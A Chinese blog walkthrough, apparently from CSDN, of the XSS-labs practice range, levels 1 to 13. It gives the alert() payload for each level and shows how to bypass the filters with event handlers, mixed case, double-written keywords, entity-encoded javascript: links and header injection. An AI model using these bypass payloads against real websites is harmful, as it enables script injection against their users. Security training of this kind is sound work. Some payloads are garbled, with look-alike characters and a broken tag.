Web安全-XSS-基础06

已于 2022-02-18 15:33:32 修改
阅读量1.4k 收藏 1
点赞数
分类专栏: Web安全-XSS 文章标签: web安全 xss
于 2022-02-17 17:55:17 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_45927819/article/details/122982309
版权

XSS-labs靶场练习1~13

第一关

在这里插入图片描述

第二关

在这里插入图片描述
input标签的属性值value中,闭合">,构建payload

"><script>alert(123)<script>

在这里插入图片描述

第三关

查看网页源代码,需要闭合单引号>
在这里插入图片描述
构建payload:

'><script>alert(1)</script>

发现<>被实体化了

在这里插入图片描述

在这里插入图片描述在这里插入图片描述

payload:

' οnmοuseοver='alert(123)'
' οnmοusemοve='alert(123)'

在这里插入图片描述

第四关

<>被过滤了

在这里插入图片描述
构建payload:

" οnmοusemοve="alert(123)

在这里插入图片描述

第五关

payload:

">123acada<script>alert(1)</script>

发现script中间被加上了一个杠

在这里插入图片描述
尝试鼠标事件:

" onmousemove='alert(123)'

依旧被添加了_
在这里插入图片描述
尝试js伪协议
就是使用a标签的href来运行javascript的方法
这里的script没有被过滤!

"> <a href=javascript:alert('xss') > xss</a>

在这里插入图片描述

第六关

script,on开头,以及href都被限制了
在这里插入图片描述到这里我才突然想起来大小写绕过。。。。。。。。。。。之前的应该也可以这样:
payload:

"><ScRipt>alert(1)</script>

在这里插入图片描述

第七关

script被过滤!
在这里插入图片描述
尝试双写绕过:
payload:

"><scscriptript>alert(1)</scscriptript>

在这里插入图片描述

第八关

可以添加友情链接,enmm尝试JAVASCRIPT伪协议

在这里插入图片描述javascript:alert(1)

被限制了
在这里插入图片描述尝试大小写:

javaScRipt:alert(1)

还是无法绕过。
尝试编码绕过:

javascript:alert(1)

直接把scirpt转成实体&#115;&#99;&#114;&#105;&#112;&#116;
payload:

java&#115;&#99;&#114;&#105;&#112;&#116;:alert(1)

在这里插入图片描述

第九关

第九关跟第八关相比多了一个判断,判断链接是否合法

if(false===strpos($str7,'http://'))
 
{
 
  echo '<center><BR><a href="您的链接不合法?有没有!">友情链接</a></center>';
 
 }

payload:

&#106;&#97;&#118;&#97;&#115;&#99;&#114;&#105;&#112;&#116;:alert('http://xss')

在这里插入图片描述

第十关

没有头绪,查看源代码会发现有三个input标签,看来是通过t_sort来传递参数的,但标签都被隐藏了,只能我们自己构造按钮,触发事件

在这里插入图片描述
payload:

&t_sort="123" type="text" onclick="alert('xss')

在这里插入图片描述

第十一关

查看源代码:
发现多了一个$str11=$_SERVER['HTTP_REFERER'];
referer传参

在这里插入图片描述看来需要自己添加referer头,添加的值绘被传入t_ref

在这里插入图片描述

构造payload1:
创建一个按钮,点击可以触发xss

referer: click me!" type="button" οnclick="alert(xss)

在这里插入图片描述
payload2:
创建一个文本框,鼠标移动上即可触发xss

referer:123" type="text" οnmοuseοver="alert('123')

在这里插入图片描述

第十二关

在这里插入图片描述
UA处注入即可,构建payload:

click me!" type="button" οnclick="alert('xss')

在这里插入图片描述

在这里插入图片描述

第十三关

cookie处注入
payload同上
在这里插入图片描述

在这里插入图片描述

Stray.io
关注
  • 0
    点赞
  • 1
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
web安全xss-lab漏洞靶子常见解决方法
AugenStern的博客
08-24 374
web安全——跨站脚本攻击(xssxssxss攻击xss类型xss-lablevel1level2level3level4level5 xss XSS全称:跨站脚本(Cross Site Scripting),为了不和层叠样式表(Cascading Style Sheets)的缩写CSS混合,所以改名为XSS。 攻击者会向web页面(input表单、URL、留言版等位置)插入恶意JavaScript代码,导致管理员/用户访问时触发,从而达到攻击者的目的。 xss攻击 绕过XSS-Filter,利用&lt
国信安web安全——xss-labs
学习记录
03-01 194
一、Xss-labs第一关 1.部署xss-labs 2.打开第一关 3.将url中name=后面内容更改为下。 二、Xss-labs第二关 1.打开第二关,查看网站源码找到格式后在url修改,得到弹窗 三、Xss-labs第三关 找到漏洞潜在页面的前端输入点 插入xss代码 观察返回页面的渲染情况 如果测试脚本未成功执行,则 查看页面源码 后端代码处理提交内容的方式 利用不同js执行方式寻求绕过 利用其他方式绕过 5.测试脚本成功执行 根据情况决定是否采取实战行
007-Web安全基础3---XSS漏洞(CISP-PTE).pptx
10-18
007-Web安全基础3---XSS漏洞(CISP-PTE).pptx
007-Web安全基础3 - XSS漏洞.pptx
10-11
XSS(cross site script)或者说跨站脚本是一种Web应用程序的漏洞,恶意攻击者往Web页面里插入恶意Script代码,当用户浏览该页之时,嵌入其中Web里面的Script代码会被执行,从而达到恶意攻击用户的目的。
XSS-labs(1-10)闯关详解
m0_46467017的博客
07-25 2596
通过查看可以知道本关与上一关的不同,在于转换后的内容不同,虽然添加了大小写转换,但是因为转换后,字符被转换为空字符,所以转换后的字符如何仍可以组合成,那么就可以绕过该防御机制。进入第八关后,发现无法构造闭合,采用是采用了htmlspecialchars($str)函数,而且闭合方式是双引号,所以input中无法注入,但是在连接里面是有地方可以注入的。右键查看源代码,发现我们输入的>,.........
Web安全-XSS-基础05
qq_45927819的博客
02-16 1495
XSS Challenges靶场练习stage 1(无过滤)stage 2(属性中的XSS注入)stage 3(选择列表中的 XSS 注入)4.Stage #4 在隐藏域中注入 XSS5.Stage 5 (限制输入长度的解决方法)6.Stage 6 (限制输入 <> XSS的注入)7.Stage 7 (限制输入引号的 XSS 注入)8.Stage 8 (JavaScript伪协议)9.Stage 9 (UTF-7编码注入)10.Stage 10 (绕过关键字domain) 靶场:https://
WEB安全基础-合集篇
10-23
WEB安全基础—合集篇,包含基础SQL注入、文件上传、XSS、CSRF、文件包含、逻辑漏洞等。适合新手上手参考学习,通过本文档,可以快速了解渗透测试。
Web应用安全XSS对策的基础.pptx
06-17
XSS对策的基础 1 输入过滤 目录 2 输出转义 输入过滤 常见的Web漏洞如XSS、SQL Injection等,都要求攻击者构造一些特殊字符,这些特殊字符可能是正常用户不会用到的,所以输入检查就有存在的必要了。 输入检查,在很...
Web安全-XSS-基础04
qq_45927819的博客
02-14 1074
XSS盗取用户信息一、盗取用户信息原理二、测试2.1 克隆登陆网站2.2 利用XSS漏洞盗取用户信息 一、盗取用户信息原理 首先克隆网站登录页面,利用存储XSS设置跳转代码,如果用户访问即跳转到克隆的登录页面,用户输入登录,账号和密码被存储。 1、用户登陆网站,我们实现利用网站的存储型xss漏洞,设置好跳转链接 2、当用户访问到XSS处,页面跳转到克隆的登陆界面 3、此时若用户进一步输入账号密码,那么我们的目的就达成了! 二、测试 2.1 克隆登陆网站 此处以dvwa登陆界面为例 下一步我们就需要克隆该
Web安全靶场】xss-labs-master 1-20
likinguuu的博客
03-03 918
xss-labs-master
【渗透测试】跨站脚本攻击(XSS):xss-labs通关简记
weixin_53972936的博客
10-25 1810
XSS又叫CSS(Cross Site Script)跨站脚本攻击,是指恶意攻击者往web页面中插入恶意代码,当用户浏览该网页时,嵌入其中的恶意代码会被执行,从而达到恶意的特殊目的。XSS属于被动式的攻击。 XSS最大的特点就是能注入恶意的HTML/JavaScript代码到用户浏览的网页上,从而达到劫持用户会话的目的。由于HTML代码和客户端JavaScript脚本能在受害者主机上的浏览器任意执行,这样等同于完全控制了Web客户端的逻辑,在这个基础上,黑客或攻击者可以轻易地发动各种各样的攻
Web安全公开课-XSS-XSS基础
r_deku的博客
03-19 194
这次的目录分为: 01跨站脚本攻击漏洞概述 02.跨站脚本攻击漏洞类型及场景 03.跨站脚本攻击漏洞实操 下面开始讲解 01跨站脚本攻击漏洞概述 那什么是跨站脚本攻击? 跨站脚本( Cross-site Scripting)攻击,攻击者通过网站注入点注入客户端可执行解析的 payload(脚本代码),当用户访问网页时,恶意 payload自动加载并执行,以达到攻击者目的(窃取 cookie、恶意传...
从内部防护汽车网络安全——硬件安全模块(HSM)保护ECU主处理器内部
dianqicyuyan的博客
04-23 394
HSM是一种硬件,它以物理方式封装了安全功能。其集成芯片专为IT安全应用而设计,通常具有自己的处理器核心、各种内存(RAM、ROM、闪存等)和硬件密码加速器。此外,HSM必须满足用于车辆应用的特定标准,并且极其有效的集成对于降低成本至关重要。其主要要求包括ECU应用程序和HSM之间的安全接口,以及用于分析故障的调试/测试接口。HSM必须能够以尽可能短的等待时间处理加密信息,并能够承受汽车环境中的标准温度。从根本上说,HSM通过其自己的处理器核心来执行汽车应用场景所需的所有IT安全功能。
网络安全(黑客)—2024自学
dexi1113的博客
04-16 1718
我在这里可以很肯定地告诉你:"网络安全有很好的发展前景,前沿网络安全技术即将崛起,或者说已经崛起"。
网络安全(黑客技术)—2024自学
TDJYGC的博客
04-17 1492
网络安全可以基于攻击和防御视角来分类,我们经常听到的 “红队”、“渗透测试” 等就是研究攻击技术,而“蓝队”、“安全运营”、“安全运维”则研究防御技术。走安全行业的工程方向的,技术上面其实有很大的重叠性,抛开甲乙方、岗位名称、岗位职责等因素来看,作为学技术的,也根据以往我们给学员推荐就业和入职情况来看,只要好好掌握以下几种技术(网络协议与安全设备、Linux操作系统、Web服务部署/开发、主流渗透测试/安全工具、一门及以上的编程语言)中的2到3个,都可以较好的胜任工作需求。
【网络安全】常见的网路安全设备及功能作用总结
白帽黑客八哥的博客
04-22 345
一种整合多种安全功能(如防火墙、防病毒、内容过滤等)于一体的网络安全设备。
网络安全之SQL注入及防御(下篇)
weixin_70911257的博客
04-23 1315
sql注入waf绕过
【网络安全】HTTP协议 — 特点
享你所想
04-23 887
【问题】为什么登录一个某些网站后,间隔一段时间,网站还是知道我们是谁呢?方法是为了告知服务器,该请求的意图是什么,向服务器所请求的资源下达命令。Http协议规定,请求从客户端发起,由服务端来响应该请求并返回。2)持久连接(HTTP keep alive)有问题可私聊:QQ:3375119339。1.URI(统一资源标识符)1)持久连接要解决的问题。五、持久连接&管线技术。1.不保存状态的协议。六、cookie技术。
网络安全实训Day16
最新发布
Yisitelz的博客
04-26 289
网络空间安全第16天学习笔记。漏洞扫描;内网渗透
web安全基础入门
08-13
Web安全是指保护Web应用程序和Web服务器免受各种安全威胁和攻击的一门技术。你是一个零基础的入门学习者,以下是一些建议: 1. 学习基础知识:首先,你需要了解Web的基本工作原理和常见的Web安全威胁。你可以学习关于HTTP协议、URL编码、会话管理和身份验证等方面的知识。 2. 学习常见攻击手法:了解常见的Web安全攻击手法,如SQL注入、跨站脚本攻击(XSS)、跨站请求伪造(CSRF)等。这些攻击手法是黑客常用的手段,通过学习它们,你可以更好地了解如何预防和应对这些攻击。 3. 实践漏洞挖掘与修复:通过搭建实验环境,学习如何发现和利用常见的Web漏洞,如SQL注入和XSS。然后学习如何修复这些漏洞,加强Web应用程序的安全性。 4. 了解Web应用防火墙(WAF):WAF是一种用于防御Web攻击的安全设备,它可以检测和阻止恶意请求。学习WAF的工作原理和配置,可以帮助你更好地了解如何保护Web应用程序免受攻击。 5. 学习安全产品和工具:了解一些常见的安全产品和工具,如IDS/IPS、WAF、数据库网关等。这些工具可以帮助你监测和防御Web攻击,提高系统的安全性。 总之,学习Web安全需要理论知识的积累和实践经验的积累。通过学习常见的攻击手法、实践漏洞挖掘与修复以及了解安全产品和工具,你可以逐步提升自己的Web安全技能和知识。引用<span class="em">1</span><span class="em">2</span><span class="em">3</span> #### 引用[.reference_title] - *1* *2* *3* [(2023版)零基础入门网络安全/Web安全,收藏这一篇就够了](https://blog.csdn.net/2301_76168381/article/details/129266018)[target="_blank" data-report-click={"spm":"1018.2226.3001.9630","extra":{"utm_source":"vip_chatgpt_common_search_pc_result","utm_medium":"distribute.pc_search_result.none-task-cask-2~all~insert_cask~default-1-null.142^v92^chatsearchT0_1"}}] [.reference_item style="max-width: 100%"] [ .reference_list ]

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值